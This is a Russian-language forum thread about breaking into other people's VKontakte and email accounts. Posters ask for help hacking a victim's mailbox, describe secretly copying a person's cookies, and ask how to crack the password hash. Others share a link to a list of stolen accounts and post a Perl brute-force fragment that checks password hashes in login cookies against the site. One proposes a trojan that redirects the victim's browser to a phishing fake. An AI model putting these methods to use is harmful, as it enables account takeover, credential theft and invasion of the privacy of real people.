Доброго времени суток! Случилась очень серьёзная и неприятная вещь в этом долбанном контакте. Собственно вот что произошло: Есть такая функция у приятеля: 'оставить анонимное мнение', собственно ей кто то пользуется со злым умыслом, шлёт оскорбления и угрозы. Это всё уже достало. Мы пробовали и в чёрный список загнать, но до этого уродец не писал в мнения ничего, и ссылку на предложения отсылали, что бы он отобразился в 'предложениях', но результат до сих пор оказался нулевым.
Вообщем вот такая неприятная ситуация. Прошу вашей помощи в разоблачении падонка!
там есть волшебная кнопочка "в черный список", жмёшь её и смотришь кто добавился в этот списочек;)
кто отгадает загадку:у всех вконтакте есть друг, some или pop его зовут, никто его не видит пока в списке друзей не поищет...? кто это?)) дам ящик пива тому, кто оперативней его сломает, а так же неограниченные возможности контакта...)) Лампа в глаза, детектор лжи, сыворотка правды здесь не поможет, здесь мозги нужны...)) а вы говорите социальная инженнерия - она тут не действует это джунгли! и в них надо влавствовать. так что: удачной охоты бандерлоги ;)
< Сообщение отредактировано t0rzan -- 16.12.2009 8:39:30 >
люди добрые.. помогите кто чем может. знаю мыло жертвы рамблеровское. как его ломануть без брута? просто вообще не имею опыта взлома мыла. в крайнем случае может ктонить согласиться этим заняться в целях благотворительности?)
Секретный вопрос точно также неоднозначен как и пароль.. "Любимый контрольный вопрос".. перепробовал все которые лежат на мыле и рамблере со всеми возможными регистрами. непомогает(
а что, через мыло парольуже не восстановить вконтакте??
помогите пожалуйста, мне нужно взломать одного человека в контакте, у меня есть пароль от его мыла, Но если пользоватся "воостаноить пароль", он присылается на мобилный телефон, а не на почту(
Оценки: 0
Присоединился: 05.01.2010
Я нащёл список аккаунтов вконтакте Больше половины не работают,но на некоторые зашло! Вот тебе сцылка: http://for-web-mastera.ru/forum/31-1862-1 Надеюсь тебе повезёт!
Раздобыл куки человека (был в гостях и скопировал, пока никого не было в комнате). Попробовал вбить хеш на hashkiller.com и ему подобные - ничего не находит. Хеш MD5 имеет вид: 505e5da684ab333c3b5d46c6787ddd47. Как его расшифровать?
Раздобыл куки человека (был в гостях и скопировал, пока никого не было в комнате). Попробовал вбить хеш на hashkiller.com и ему подобные - ничего не находит. Хеш MD5 имеет вид: 505e5da684ab333c3b5d46c6787ddd47. Как его расшифровать?
Куки сейчас не актуальны. Хоть ты убейся, идет привязка по ip. А на счет того что пароль приходит на телефон, тестил не один раз, мне приходит на мыло, хоть акк привязан к номеру мобилы. Хз...рандом?
Cегодня лазал по страничкам и увидел у пары знакомых на странице в контактной информации Никнейм на форуме: Залез в (Моя страница▼ » Контакты ) но этого не обнаружил....
ЛЮДИ! МЕНЯ ПЫТАЮТСЯ ВЗЛОМАТЬ! КТО НИТЬ, ПОМОГИТЕ ВЫЧИСЛИТЬ ГАДОВ!
От кого: ВКонтакте.ру <admin@vkontakte.ru> Кому: dr*** <dr***@mail.ru> Дата: 08 Янв 2010 14:29:17 Тема: Тарас Петрухин добавил Вас в друзья на сайте ВКонтакте.ру
dr***,
Тарас Петрухин добавил Вас в друзья на сайте ВКонтакте.ру
Вы можете зайти на сайт и просмотреть страницы Ваших друзей, используя Ваш e-mail и автоматически созданный пароль: I0WNYbVB
ВКонтакте.ру - сайт, который ежедневно позволяет десяткам миллионов людей находить старых друзей и оставаться с ними на связи, делиться фотографиями и событиями из жизни.
ЛЮДИ! МЕНЯ ПЫТАЮТСЯ ВЗЛОМАТЬ! КТО НИТЬ, ПОМОГИТЕ ВЫЧИСЛИТЬ ГАДОВ!
От кого: ВКонтакте.ру <admin@vkontakte.ru> Кому: dr*** <dr***@mail.ru> Дата: 08 Янв 2010 14:29:17 Тема: Тарас Петрухин добавил Вас в друзья на сайте ВКонтакте.ру
dr***,
Тарас Петрухин добавил Вас в друзья на сайте ВКонтакте.ру
Вы можете зайти на сайт и просмотреть страницы Ваших друзей, используя Ваш e-mail и автоматически созданный пароль: I0WNYbVB
ВКонтакте.ру - сайт, который ежедневно позволяет десяткам миллионов людей находить старых друзей и оставаться с ними на связи, делиться фотографиями и событиями из жизни.
Внимание: Ваша регистрация не будет активирована, если Вы проигнорируете это приглашение.
Желаем удачи! С уважением, Администрация ВКонтакте.ру
------------------------------- я думаю в этом интересно разобраться) Подскажите кто нить, как это сделать...
мдя !!! тебя кто то тупо пригласил в контакт рейт себе набивают у меня жену так приглашали не давно приглашал какойто дядя с ооохерительным рейтом а патом удалился сам
Привет!!!Помогите плз посмотрел кучу видео "Как взломать vkontakte.ru" Почти на всех выбивало блокнот в котором нуно было менять строку на id. Где найти етот блокнот?
Привет!!!Помогите плз посмотрел кучу видео "Как взломать vkontakte.ru" Почти на всех выбивало блокнот в котором нуно было менять строку на id. Где найти етот блокнот?
Эм...сам понял что сказал?
quote:
Cегодня лазал по страничкам и увидел у пары знакомых на странице в контактной информации Никнейм на форуме: Залез в (Моя страница▼ » Контакты ) но этого не обнаружил....
$md5 = MD5->hexhash($pass); $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80); print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n". "Host: vkontakte.ru\r\n". "Accept: */*\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "User-Agent: Mozillo\r\n". "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n". "Connection: close\r\n\r\n"; $answ = <$sock>; close $sock; print "$pass $answ"; if ($answ =~ /302/){ open (good, '>>good.txt'); print good "$id:$pass:$md5\n"; print "$id:$pass:$md5\n"; close good; exit;} }
}
goto Next;
sub pass { my (@mas); while ( ){ push @mas, $_; last if (@mas == 400); } chomp @mas; return @mas; }
Блин это брут на perl. Забудь, сейчас Вконтакте частая капча, это год - два назад можно было брутить. Или запасаться "очень круглым" количеством проксей.
Оценки: 15
Присоединился: 04.09.2009
Чтобы не парится с поиском уязвимостей вконтаке просто сделаем его фейк. Где то читал (только не помню где) про новые способы его кому нибудь впарить. Лучше всего написать траяна который подменяет в браузере урл на фейковый при энтом пришет vkontakte.ru. Потом просто впариваем энтого траяна тому кого мы хотим хакнуть и ждем пока все что нам нужно придет к нам само.
Для знающих людей подскажите как посмотреть закрытую страницу 9не фото, не приложения, не музыку, не видео) А имено нужно посмотреть главную страницу со стеной, подарками и данные. Ссылку с подменной ИД идут лесом все это не то! Кто знает четкую ссылку на то что бы посмотреть закрытую страницу плз в личку дайте сылку. ЕЩЕ РАЗ ПОВТОРЮСЬ ПОДМЕНА ИД ЭТО ДЛЯ ШКОЛЬНИКОВ НУЖНО ЧТО ТО ДРУГОЕ!
Для знающих людей подскажите как посмотреть закрытую страницу 9не фото, не приложения, не музыку, не видео) А имено нужно посмотреть главную страницу со стеной, подарками и данные. Ссылку с подменной ИД идут лесом все это не то! Кто знает четкую ссылку на то что бы посмотреть закрытую страницу плз в личку дайте сылку. ЕЩЕ РАЗ ПОВТОРЮСЬ ПОДМЕНА ИД ЭТО ДЛЯ ШКОЛЬНИКОВ НУЖНО ЧТО ТО ДРУГОЕ!
И как его изменять???? я в Mozilla FireFox захожу на Исходный код странницы, нахожу там <div id="rateGold" style="cursor: pointer" onclick="showRateBox()"> <div id="percentGold">101</div> <div class="clearFix"> <div id="rateLeftGold" style="width:20px"> </div> <div id="rateRightGold" style="width:179px"> </div> </div> </div>
Этот новее код, вот как его именить? Подскажите плз, или какой программой